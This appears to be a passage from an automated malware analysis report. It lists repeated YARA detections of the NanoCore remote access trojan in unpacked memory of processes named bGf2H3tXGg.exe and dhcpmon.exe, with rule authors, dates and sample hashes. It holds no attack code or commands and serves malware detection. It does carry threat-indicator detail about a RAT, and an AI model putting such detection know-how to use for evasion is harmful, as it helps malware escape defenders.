        Source: 17.2.dhcpmon.exe.24c0000.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 3.2.bGf2H3tXGg.exe.340c550.8.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 3.2.bGf2H3tXGg.exe.340c550.8.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 14.2.bGf2H3tXGg.exe.254b998.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 14.2.bGf2H3tXGg.exe.254b998.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 11.2.bGf2H3tXGg.exe.29b0000.4.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 11.2.bGf2H3tXGg.exe.29b0000.4.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 11.2.bGf2H3tXGg.exe.29b0000.4.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 17.2.dhcpmon.exe.3565530.6.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 17.2.dhcpmon.exe.3565530.6.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 17.2.dhcpmon.exe.3565530.6.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 17.2.dhcpmon.exe.35e3214.8.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 17.2.dhcpmon.exe.35e3214.8.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 22.2.dhcpmon.exe.350e3de.10.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 22.2.dhcpmon.exe.350e3de.10.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 22.2.dhcpmon.exe.350e3de.10.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 3.2.bGf2H3tXGg.exe.21d0000.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 3.2.bGf2H3tXGg.exe.21d0000.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 3.2.bGf2H3tXGg.exe.21d0000.3.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 14.2.bGf2H3tXGg.exe.3563214.6.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 14.2.bGf2H3tXGg.exe.3563214.6.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 12.2.dhcpmon.exe.28c1458.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 12.2.dhcpmon.exe.28c1458.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 12.2.dhcpmon.exe.28c1458.3.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 22.2.dhcpmon.exe.351783d.9.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 22.2.dhcpmon.exe.351783d.9.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 14.1.bGf2H3tXGg.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 14.1.bGf2H3tXGg.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 14.1.bGf2H3tXGg.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 14.2.bGf2H3tXGg.exe.415058.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 14.2.bGf2H3tXGg.exe.415058.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 14.2.bGf2H3tXGg.exe.415058.1.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 14.2.bGf2H3tXGg.exe.4a80000.10.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 14.2.bGf2H3tXGg.exe.4a80000.10.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 14.2.bGf2H3tXGg.exe.4a80000.10.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 12.2.dhcpmon.exe.28b0000.4.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 12.2.dhcpmon.exe.28b0000.4.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 12.2.dhcpmon.exe.28b0000.4.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 14.2.bGf2H3tXGg.exe.34e5530.5.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 14.2.bGf2H3tXGg.exe.34e5530.5.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 14.2.bGf2H3tXGg.exe.34e5530.5.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 12.2.dhcpmon.exe.28c1458.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 12.2.dhcpmon.exe.28c1458.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 12.2.dhcpmon.exe.28c1458.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 14.2.bGf2H3tXGg.exe.415058.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 14.2.bGf2H3tXGg.exe.415058.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 14.2.bGf2H3tXGg.exe.415058.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 22.2.dhcpmon.exe.415058.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 22.2.dhcpmon.exe.415058.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 22.2.dhcpmon.exe.415058.0.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 17.2.dhcpmon.exe.24c0000.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 17.2.dhcpmon.exe.24c0000.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 17.2.dhcpmon.exe.24c0000.3.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 22.2.dhcpmon.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 22.2.dhcpmon.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 22.2.dhcpmon.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 15.2.dhcpmon.exe.2881458.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 15.2.dhcpmon.exe.2881458.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 15.2.dhcpmon.exe.2881458.4.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 15.2.dhcpmon.exe.2870000.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 15.2.dhcpmon.exe.2870000.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 15.2.dhcpmon.exe.2870000.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 17.2.dhcpmon.exe.415058.0.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 17.2.dhcpmon.exe.415058.0.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 17.2.dhcpmon.exe.415058.0.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 14.2.bGf2H3tXGg.exe.3563214.6.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 14.2.bGf2H3tXGg.exe.3563214.6.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 17.2.dhcpmon.exe.525980.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 17.2.dhcpmon.exe.525980.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 17.2.dhcpmon.exe.525980.2.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 22.2.dhcpmon.exe.23b0000.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 22.2.dhcpmon.exe.23b0000.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 22.2.dhcpmon.exe.23b0000.3.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 14.2.bGf2H3tXGg.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 14.2.bGf2H3tXGg.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 14.2.bGf2H3tXGg.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 22.2.dhcpmon.exe.24fba7c.6.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 22.2.dhcpmon.exe.24fba7c.6.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 22.2.dhcpmon.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 22.2.dhcpmon.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 22.2.dhcpmon.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 17.2.dhcpmon.exe.35e783d.7.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 17.2.dhcpmon.exe.35e783d.7.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 3.2.bGf2H3tXGg.exe.21d0000.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
